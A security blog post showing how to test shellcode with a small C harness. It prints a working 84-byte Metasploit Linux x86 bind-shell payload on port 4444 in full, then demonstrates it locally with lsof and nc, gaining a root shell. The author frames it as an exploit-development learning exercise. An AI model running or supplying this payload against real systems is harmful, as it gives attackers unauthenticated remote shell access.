Testing Shellcode For Functionality
I am still trying to exploit the program I have blogged about on several previous occasions. Unfortunately I have come to an impassible debugging point and I guess I am just going to have to let this one drop for now. Perhaps I’ll pick up with another program some other time.
What I will leave you with is a way to be sure that your shellcode will properly operate on the system you are trying to exploit. I found this method while reviewing an introduction to shellcode written by Samy Al Bahra that I found through Wikipedia’s shellcode article.
Basically, if you want to test that your shellcode will operate properly without testing through a program that you are going to exploit you should place it in the buffer of the following program. This example shows some shellcode that will bind to port 4444 on a linux box and wait for a conneciton.
BT test # cat test_shell.c
/*
* linux/x86/shell_bind_tcp – 84 bytes
* http://www.metasploit.com
* Encoder: generic/none
* LPORT=4444
*/
unsigned char buf[] =
“\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80″
“\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50″
“\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56″
“\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80″
“\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69″
“\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80″;main(){
int (* shell)();
shell=buf;
shell();
}
Compile and run this code. As this is a linux system I tested to see if the program had actually bound to the port.
BT test # lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
dhcpcd 4235 root 4u IPv4 7186 UDP *:bootpc
X 11093 root 1u IPv6 12351 TCP *:x11 (LISTEN)
X 11093 root 3u IPv4 12352 TCP *:x11 (LISTEN)
test_shel 24043 root 3u IPv4 46059 TCP *:krb524 (LISTEN)
Just so that everybody is clear. The output of lsof reports that test_shell is bound to the port labeled “krb524″. This is port 4444 by another name. Here is the output of the services definition file.
BT test # grep krb524 /etc/services
krb524 4444/tcp
krb524 4444/udp
# PROBLEM krb524 assigned the port,
The final test is to connect to the port opened up by the test_shell program.
BT test # nc localhost 4444
lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
dhcpcd 4235 root 4u IPv4 7186 UDP *:bootpc
X 11093 root 1u IPv6 12351 TCP *:x11 (LISTEN)
X 11093 root 3u IPv4 12352 TCP *:x11 (LISTEN)
sh 24700 root 0u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
sh 24700 root 1u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
sh 24700 root 2u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
sh 24700 root 3u IPv4 46764 TCP *:krb524 (LISTEN)
sh 24700 root 4u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
nc 25740 root 3u IPv4 47960 TCP localhost:53365->localhost:krb524 (ESTABLISHED)
lsof 25749 root 0u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
lsof 25749 root 1u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
lsof 25749 root 2u IPv4 46765 TCP localhost:krb524->localhost:53365 (ESTABLISHED)
Done.
I hope that all of this has been informative. Normally I would not stop until I have gotten this exercise to work but, for now, I am going to have to set this one off to the side. Mostly because I need to work on some other things right now but also because I have reached the limits of my debugging knowledge.
Go forth and do good things,
Cutaway
shellcode, exploit, Security Ripcord
Help support my training and travel to security conferences. Get your SANS Training and GIAC Certifications through the Security Ripcord.
You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Leave a Reply